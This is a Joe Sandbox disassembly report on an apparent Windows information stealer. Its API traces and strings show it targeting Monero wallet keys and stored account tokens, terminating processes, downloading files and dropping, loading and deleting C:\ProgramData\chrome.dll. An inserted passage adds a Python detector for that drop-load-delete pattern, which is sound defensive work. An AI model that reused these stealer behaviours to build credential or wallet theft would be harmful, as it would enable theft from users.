                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: Password
                                        • API String ID: 2808661185-3434357891
                                        • Opcode ID: 1971b12eb50871bfea0fb6713388ddd2da31e5f8d31a6bdb8a87bc7e7cef1773
                                        • Instruction ID: e59bc155ece299b7b49da3e76738ed098c360ea6038294a2b6d4d5f9a829ceeb
                                        • Opcode Fuzzy Hash: 1971b12eb50871bfea0fb6713388ddd2da31e5f8d31a6bdb8a87bc7e7cef1773
                                        • Instruction Fuzzy Hash: 7C611CB69441689BDB24DB50CC55BDAB7B8BF84304F00C5E9E64DA6141EFB06BC9CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0181F320,00000000,?,00990E14,00000000,?,00000000), ref: 009882C0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009882C7
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009882E8
                                        • __aulldiv.LIBCMT ref: 00988302
                                        • __aulldiv.LIBCMT ref: 00988310
                                        • wsprintfA.USER32 ref: 0098833C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2774356765-3474575989
                                        • Opcode ID: 23ce0d09d551edca69b076c4f2139135efec432d934697016330d101c522083b
                                        • Instruction ID: e2d85f7ad3296a61bf8f577906cbda7b357a55d2d35d1f30a4e810fa5557a115
                                        • Opcode Fuzzy Hash: 23ce0d09d551edca69b076c4f2139135efec432d934697016330d101c522083b
                                        • Instruction Fuzzy Hash: 1A2138B1E44208ABDB10EFD4CC49FAEB7B8FB44B04F104609F215BB2C0D7B859008BA4
                                        APIs
                                          • Part of subcall function 00988CF0: GetSystemTime.KERNEL32(00990E1B,0181EC50,009905B6,?,?,009713F9,?,0000001A,00990E1B,00000000,?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 00988D16
                                        • wsprintfA.USER32 ref: 00979E7F
                                        • memset.MSVCRT ref: 00979EED
                                        • lstrcat.KERNEL32(00000000,?), ref: 00979F03
                                        • lstrcat.KERNEL32(00000000,?), ref: 00979F17
                                        • lstrcat.KERNEL32(00000000,009912D8), ref: 00979F29
                                        • lstrcpy.KERNEL32(?,00000000), ref: 00979F7C
                                        • memset.MSVCRT ref: 00979F9C
                                        • Sleep.KERNEL32(00001388), ref: 0097A013
                                          • Part of subcall function 009899A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009899C5
                                          • Part of subcall function 009899A0: Process32First.KERNEL32(0097A056,00000128), ref: 009899D9
                                          • Part of subcall function 009899A0: Process32Next.KERNEL32(0097A056,00000128), ref: 009899F2
                                          • Part of subcall function 009899A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00989A4E
                                          • Part of subcall function 009899A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00989A6C
                                          • Part of subcall function 009899A0: CloseHandle.KERNEL32(00000000), ref: 00989A79
                                          • Part of subcall function 009899A0: CloseHandle.KERNEL32(0097A056), ref: 00989A88
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                        • String ID: D
                                        • API String ID: 3242155833-2746444292
                                        • Opcode ID: 85fe0e651f24082420265e0d58bf6bbeee68bf7a543f0dd49746fc0602395113
                                        • Instruction ID: 9a12d7e17ee026baf6c4a581e916ad344f63200387c1cb7dddacde00e6d6d4c9
                                        • Opcode Fuzzy Hash: 85fe0e651f24082420265e0d58bf6bbeee68bf7a543f0dd49746fc0602395113
                                        • Instruction Fuzzy Hash: 705174B5944318ABEB24EB60DC4AFDE7378BB84700F044598B60DAB2D1EB759B84CF51
                                        APIs
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                          • Part of subcall function 00974800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00974889
                                          • Part of subcall function 00974800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00974899
                                        • InternetOpenA.WININET(00990DFB,00000001,00000000,00000000,00000000), ref: 0097615F
                                        • StrCmpCA.SHLWAPI(?,0181FCB0), ref: 00976197
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009761DF
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00976203
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 0097622C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0097625A
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00976299
                                        • InternetCloseHandle.WININET(?), ref: 009762A3
                                        • InternetCloseHandle.WININET(00000000), ref: 009762B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2507841554-0
                                        • Opcode ID: 27ac6456bcf28ac59224dd14e45405303453368241ebd8254ac8b064b42d4240
                                        • Instruction ID: 1a881894c09724b51b5b0bdbb299a033eb83fce98f411ad41b82f1ee9cd63fc4
                                        • Opcode Fuzzy Hash: 27ac6456bcf28ac59224dd14e45405303453368241ebd8254ac8b064b42d4240
                                        • Instruction Fuzzy Hash: 615161B1A00618AFEF20DF90DC49BEE7779BB44301F108599F609A71C1DB74AA89CF95
                                        APIs
                                        • type_info::operator==.LIBVCRUNTIME ref: 009F024D
                                        • ___TypeMatch.LIBVCRUNTIME ref: 009F035B
                                        • CatchIt.LIBVCRUNTIME ref: 009F03AC
                                        • CallUnexpected.LIBVCRUNTIME ref: 009F04C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 2356445960-393685449
                                        • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction ID: 321768decaee139e0ef655438d7d4ef567bc1494db47abbe1ebe70d53a26f7f4
                                        • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                        • Instruction Fuzzy Hash: 72B16A7180020DDFCF15DFA4C881ABEBBBDBF84314B14416AEA156B262E770DA51CBA1
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • lstrlen.KERNEL32(00000000), ref: 0097BC6F
                                          • Part of subcall function 00988FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988FE2
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0097BC9D
                                        • lstrlen.KERNEL32(00000000), ref: 0097BD75
                                        • lstrlen.KERNEL32(00000000), ref: 0097BD89
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 3073930149-1079375795
                                        • Opcode ID: 40ba65445008513fbf4255b6e7610d19e65961f5b7071785427a62925ddf22a0
                                        • Instruction ID: 63c6f44424fe9953d14ae992aaaf72b3661373a1fdcb398cd72df8ed4be30104
                                        • Opcode Fuzzy Hash: 40ba65445008513fbf4255b6e7610d19e65961f5b7071785427a62925ddf22a0
                                        • Instruction Fuzzy Hash: 9AB111729101089BDF14FBA4DDA6FEE7379BF94300F40456AF50676291EF386A48CB62
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: *
                                        • API String ID: 1494266314-163128923
                                        • Opcode ID: 3ee9d864a1ddb7443d2945e45de231f26fce92ae2d0fe26947a84f30711441bc
                                        • Instruction ID: d1de82176c7e5501bfa7a9a1abbe46620c7e2bd6265dee02a623ed5914938680
                                        • Opcode Fuzzy Hash: 3ee9d864a1ddb7443d2945e45de231f26fce92ae2d0fe26947a84f30711441bc
                                        • Instruction Fuzzy Hash: 5BF08234A0C209EFD744AFE0EC0975CBB30FB06707F114295F61E9A290C7704A40DB51
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 00989850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,009808DC,C:\ProgramData\chrome.dll), ref: 00989871
                                          • Part of subcall function 0097A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0097A098
                                        • StrCmpCA.SHLWAPI(00000000,01818BD8), ref: 00980922
                                        • StrCmpCA.SHLWAPI(00000000,01818BF8), ref: 00980B79
                                        • StrCmpCA.SHLWAPI(00000000,01818C38), ref: 00980A0C
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00980C35
                                        Strings
                                        • C:\ProgramData\chrome.dll, xrefs: 00980C30
                                        • C:\ProgramData\chrome.dll, xrefs: 009808CD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                        • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                        • API String ID: 585553867-663540502
                                        • Opcode ID: b7daac8f709b410fefab0801365483035d0506dd51b7cfd13b5c17c129fb93bb
                                        • Instruction ID: f5abf5bc4b6f2757ff2acd1e264e7f214be2e5084a5e55cc9a46cbb9fd0fb2bc
                                        • Opcode Fuzzy Hash: b7daac8f709b410fefab0801365483035d0506dd51b7cfd13b5c17c129fb93bb
                                        • Instruction Fuzzy Hash: 6DA134717002099FCB28FF64D996BAD777ABFD5300F108569E80A9F351DA349A09CB92
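The entry above shows the sample writing C:\ProgramData\chrome.dll (CreateFileA with dwDesiredAccess 0x40000000 = GENERIC_WRITE and dwCreationDisposition 2 = CREATE_ALWAYS), loading it with LoadLibraryA and then removing it with DeleteFileA. On an endpoint that sequence leaves a file write, an image load and a file delete of the same path by the same process. The Python below is an added example, not part of this Joe Sandbox report or of the sample's code: it correlates constructed Sysmon-style events (event IDs 11 = FileCreate, 7 = ImageLoad, 23 = FileDelete; the record field names are this example's own, not Sysmon's) and escalates when the delete follows the load, because the dropped DLL then has to be recovered from process memory or a shadow copy rather than from disk.

```python
from collections import defaultdict
from datetime import datetime

# Directories from which a just-written DLL is rarely loaded by legitimate software.
SUSPICIOUS_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")

# Constructed telemetry in a Sysmon-like shape: 11 = FileCreate, 7 = ImageLoad,
# 23 = FileDelete. Field names are this example's own.
EVENTS = [
    # The stealer-like sequence from the report: write, load, delete chrome.dll.
    {"ts": "2024-10-27T10:00:01", "id": 11, "pguid": "{A}", "image": "C:\\Users\\u\\file.exe",
     "path": "C:\\ProgramData\\chrome.dll"},
    {"ts": "2024-10-27T10:00:02", "id": 7, "pguid": "{A}", "image": "C:\\Users\\u\\file.exe",
     "path": "C:\\ProgramData\\chrome.dll"},
    {"ts": "2024-10-27T10:00:09", "id": 23, "pguid": "{A}", "image": "C:\\Users\\u\\file.exe",
     "path": "C:\\ProgramData\\chrome.dll"},
    # Benign: an installer writing and loading a DLL under Program Files.
    {"ts": "2024-10-27T10:05:00", "id": 11, "pguid": "{B}", "image": "C:\\Temp\\setup.exe",
     "path": "C:\\Program Files\\App\\app.dll"},
    {"ts": "2024-10-27T10:05:01", "id": 7, "pguid": "{B}", "image": "C:\\Temp\\setup.exe",
     "path": "C:\\Program Files\\App\\app.dll"},
    # Partial: dropped and loaded under ProgramData but not (yet) deleted.
    {"ts": "2024-10-27T10:07:00", "id": 11, "pguid": "{C}", "image": "C:\\Users\\u\\other.exe",
     "path": "C:\\ProgramData\\helper.dll"},
    {"ts": "2024-10-27T10:07:01", "id": 7, "pguid": "{C}", "image": "C:\\Users\\u\\other.exe",
     "path": "C:\\ProgramData\\helper.dll"},
]


def correlate_drop_load_delete(events, window_s=600):
    """Group events by (process GUID, path); flag DLLs under SUSPICIOUS_DIRS that the
    same process wrote and then loaded, and escalate when it also deleted them."""
    tracks = defaultdict(lambda: {"image": None, "seen": {}})
    for ev in events:
        t = tracks[(ev["pguid"], ev["path"].lower())]
        t["image"] = ev["image"]
        # Keep the first timestamp per event ID so repeated loads do not reorder the chain.
        t["seen"].setdefault(ev["id"], datetime.fromisoformat(ev["ts"]))

    alerts = []
    for (pguid, path), t in tracks.items():
        seen = t["seen"]
        if not path.startswith(SUSPICIOUS_DIRS) or not path.endswith(".dll"):
            continue
        if 11 not in seen or 7 not in seen or seen[7] < seen[11]:
            continue  # not written by this process, or loaded before the write
        alert = {"pguid": pguid, "image": t["image"], "path": path, "severity": "medium",
                 "note": "dropped DLL still on disk: collect it"}
        if 23 in seen and seen[23] >= seen[7] and (seen[23] - seen[11]).total_seconds() <= window_s:
            alert.update(severity="high", dwell_s=(seen[23] - seen[11]).total_seconds(),
                         note="DLL deleted after load: recover from process memory or VSS")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in correlate_drop_load_delete(EVENTS):
        print(a["severity"], a["image"], a["path"], a["note"])
```

Keying on the process GUID rather than the PID matters here: the sample deletes the DLL within seconds, and PIDs are reused, so a PID-keyed join will eventually pair an unrelated process's delete with the write. The medium-severity branch is deliberately kept, since on a host where the deletion has not happened yet the file under C:\ProgramData is the best artefact to grab.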
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFA1F
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 009EFA27
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFAB0
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 009EFADB
                                        • _ValidateLocalCookies.LIBCMT ref: 009EFB30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction ID: 371e2ba578dfd62c8d5108b0989bd658a366a84b5073ac092648e629cd1b610e
                                        • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                        • Instruction Fuzzy Hash: 0041B235900248EBCF11DF69C890AAE7BA9FF89314F148166E91CAB392D7319E01CB91
                                        APIs
